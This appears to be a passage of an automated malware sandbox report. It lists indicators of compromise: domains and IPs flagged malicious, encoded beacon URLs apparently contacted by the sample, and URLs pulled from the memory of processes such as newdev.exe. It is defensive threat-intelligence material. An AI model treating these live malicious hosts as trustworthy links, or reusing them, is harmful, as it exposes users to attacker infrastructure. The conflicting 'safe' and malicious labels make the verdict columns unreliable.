http://www.8686206.xyz/xiaotianyou/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/387e999603.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/sanshangyouyak/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/238d999752.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/caimeixunguoz/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/563a999427.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/shananfenghua/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/mingrihuaqiluo/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/646c999344.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/daqiaoweijiu/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/jingxiangJULIA/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/boduoyejieyi/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/712d999278.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/117d999873.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/096e599898.html	0%	Avira URL Cloud	safe
http://www.litespeedtech.com/error-page	0%	Avira URL Cloud	safe
http://www.8686206.xyz/beitiaomafei/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/9c599985.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/52b999938.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/271b999719.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/316e999674.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/ee0m/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/188e999802.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/template/news/newsblue/css/common.css	0%	Avira URL Cloud	safe
http://www.8686206.xyz/shuiyechaoyangh/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/057b999933.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/shuiximeili/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/xiqijiexika/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/aiyinmaliya/	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/294a499701.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/516f699477.html	0%	Avira URL Cloud	safe
http://www.8686206.xyz/Chat/492a699501.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.topkapiescortg.xyz	104.21.32.1	true	true	unknown
www.expertguide.info	69.57.163.64	true	true	unknown
dadu89.org	64.46.102.238	true	true	unknown
www.masterqq.pro	104.21.32.1	true	true	unknown
banajibazar.xyz	173.208.249.155	true	true	unknown
www.shipley.group	13.248.169.48	true	true	unknown
www.8686206.xyz	103.249.106.91	true	true	unknown
www.dadu89.org	unknown	unknown	false	unknown
www.growbamboo.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.masterqq.pro/3vdc/	true	Avira URL Cloud: safe	unknown
http://www.shipley.group/wfhx/?kPJ4bZ=UOoh4KWgwd2uK2Fv/Y1dgfL/8dbcrZUnUaCbH/KIeaCVkdBdb+xIXB95VKjrucq/x/UHPGjJtfXL4g7pUq+6Gw82pv1ZnniYkrWC0OZFP+5EUlQNbciF2fEf2sN//T48Iuc7ZyI=&cHdXN=988T3LsXMJJH2nc	true	Avira URL Cloud: safe	unknown
http://www.shipley.group/wfhx/	true	Avira URL Cloud: safe	unknown
http://www.growbamboo.xyz/e948/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=OI9Cl4brfnKnEU4iz0SiaxRa9h1FDMDvQ4DRdccrsueMHwTXZC0uGTlQqvZMtZjxNZZWYO9eSaARepBsGdBKuQ+lt96Nu4y5aB841AjeaGyZFFzppkHuNwNXfZrWKvYHi/gwd9U=	true	Avira URL Cloud: safe	unknown
http://www.dadu89.org/4e0r/?kPJ4bZ=QT7390Zj1CMJ3HXZrGeN4EAmJbS0Q78DLI8P1UXKji+VvkgG1NYkqFCcU0D6dMabZFhcgMAZgOWRTpEkDoRZObnAtKSbK/tYjp8uZanJfEmCFVgpAUq3InqUAbbh39nPBUu+z58=&cHdXN=988T3LsXMJJH2nc	true	Avira URL Cloud: safe	unknown
http://www.masterqq.pro/3vdc/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=vh8Uzz9OV8fhtH1meqE382RNszCOVpONbZRjfq/B9uLstFCNE3abmEu4DqeFZKdG1EFxV7BY8Pk1G/TVKAGyDG9O4gm487ojHWjIBSjIyrwvajxFI/Xm2dfZY0oucSMge7jdbTw=	true	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/ee0m/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=NHwLdo+0jCxtc5CMzIw414F1hBe8Rgh0gZLzRNbcc711dto5H4xmohMbIzAu7+z3xUnofEY5EO/2HGiLPESvf5/iyPfqyBnB3f9+h0VfvTzsaTNCRAbWAe36t302UentalrYUm4=	true	Avira URL Cloud: safe	unknown
http://www.dadu89.org/4e0r/	true	Avira URL Cloud: safe	unknown
http://www.growbamboo.xyz/e948/	true	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/ee0m/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.8686206.xyz/macangyou/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8686206.xyz/Chat/679d799313.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8686206.xyz/Chat/64f999926.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/445f999545.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/149c999841.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/591e999399.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/jinmeixiang/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/gongdilan/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/youtianzhenxi/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/xiaoxiyou/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/yuantianmeiying/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/022b799970.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.growbamboo.xyz	CsyVZPSRWzlUG.exe, 00000009.00000002.4049320310.00000000008C4000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/699e999291.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/sanshangyouya/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/cangjingkong/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/664e999326.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/template/news/newsblue/css/base.css	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/xiaodaonan/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/642b499353.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/xidaoailiw/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8686206.xyz/Chat/791b999199.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/shangyuanruisui/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8686206.xyz/Chat/369a999621.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/yingmulin/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/shiyinnailan/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/lingmuxinchun/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/micangsuixiang/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/479b699514.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/203f999787.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/longzeluola/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/dongyuefeng/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/xiaozaochuanlianzi/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/722f499273.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/901d999089.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/fengjianyoumei/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/shuiyechaoyang/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/000c999990.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/sitemap.xml	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/kuisi/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/175d999815.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/gaoqiaoshengzi/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8686206.xyz/Chat/29d999961.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/198c999792.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/689f999301.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/lingcunailid/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/167c999823.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/xidaoaili/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	newdev.exe, 00000008.00000002.4051240751.0000000005B50000.00000004.10000000.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000036D0000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.8686206.xyz/taoguhuilixiangx/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/387e999603.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8686206.xyz/xiaotianyou/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/238d999752.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/sanshangyouyak/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/563a999427.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/caimeixunguoz/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/mingrihuaqiluo/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/shananfenghua/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/096e599898.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/712d999278.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/daqiaoweijiu/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/646c999344.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/boduoyejieyi/	CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/beitiaomafei/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/jingxiangJULIA/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
